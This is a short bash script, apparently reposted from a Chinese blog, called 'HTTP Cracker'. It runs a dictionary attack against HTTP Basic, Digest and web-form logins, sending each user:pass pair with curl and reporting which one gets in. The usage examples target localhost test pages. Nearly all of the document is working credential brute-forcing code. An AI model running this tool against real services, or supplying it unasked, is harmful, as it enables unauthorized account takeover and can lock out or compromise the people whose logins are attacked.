#!/bin/bash
help () {
echo " ---------------- HTTP Cracker v1.0 (20151206) ---------------------- "
echo " -u [URL] set the url for crack "
echo " -d [filename] a dic file contain many user:pass line"
echo " -m [mode] set the crack mode {0:basic 1:digest 2:form}, default is 0 "
echo " -s [strings] set error string for the form mode "
echo " -g manual get error string for the form mode "
echo
echo " example: "
echo " 1. http_cracker.sh -u \"http://127.0.0.1:80/auth_basic/\" -d 1.txt -m 0 "
echo " 2. http_cracker.sh -u \"http://127.0.0.1:80/auth_digest/\" -d 1.txt -m 1 "
echo " 3. http_cracker.sh -u \"http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}\" -d 1.txt -m 2 -g "
echo " 4. http_cracker.sh -u \"http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}\" -d 1.txt -m 2 -s \"Yahei\" "
echo " -------------------------------------------------------------------- "
exit 1
}
while getopts ":u:d:m:s:g" Option
do
case $Option in
u )
opt_url=$OPTARG
;;
d )
opt_dic=$OPTARG
;;
m )
opt_mode=$OPTARG
;;
s )
opt_string=$OPTARG
;;
g )
opt_get=1
;;
esac
done
shift $(($OPTIND - 1))
[ -z $opt_url ] && help
[ -z $opt_dic ] && help
[ -z $opt_mode ] && opt_mode=0
[ -z $opt_get ] && opt_get=0
[ 2 == $opt_mode ] && [ 0 == $opt_get ] && [ -z $opt_string ] && help
var_sock_timeout=3
var_pairs_delim=':'
echo 'Running...'
for var_pairs in $(cat $opt_dic)
do
user=`echo $var_pairs | cut -d $var_pairs_delim -f 1`
pass=`echo $var_pairs | cut -d $var_pairs_delim -f 2`
if [ 0 == $opt_mode ]; then
ret=$(curl --user-agent "" -m $var_sock_timeout -s -I $opt_url --basic -u $user:$pass)
[ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
ret=`echo "$ret" | awk 'NR==1 {print $3}'`
[ -z `echo $ret | grep 'Unauthorized'` ] && echo -e "\n[$user:$pass] is Found!!! [$opt_url]" && break
elif [ 1 == $opt_mode ]; then
ret=`curl --user-agent "" -m $var_sock_timeout -s -I $opt_url --digest -u $user:$pass`
[ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
ret=`echo "$ret" | grep 'HTTP/1.1 200 OK'`
[ ! -z "$ret" ] && echo && echo "[$user:$pass] is Found!!! [$opt_url]" && break
elif [ 2 == $opt_mode ]; then
var_http_form_url=`echo $opt_url | cut -d '@' -f 1`
var_http_form_dat=`echo $opt_url | cut -d '@' -f 2`
var_http_form_dat=${var_http_form_dat/\{USER\}/$user}
var_http_form_dat=${var_http_form_dat/\{PASS\}/$pass}
ret=`curl --user-agent "" -m $var_sock_timeout -s $var_http_form_url --data "$var_http_form_dat"`
[ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
if [ 1 == $opt_get ]; then
echo "$ret" && break
else
ret=`echo "$ret" | grep "$opt_string"`
[ -z "$ret" ] && echo -e "\n[$user:$pass] is Found!!! [$opt_url]" && break
fi
fi
echo -n '*'
done
echo
echo 'Game Over'
echo
http_cracker.sh
最新推荐文章于 2022-03-23 16:25:29 发布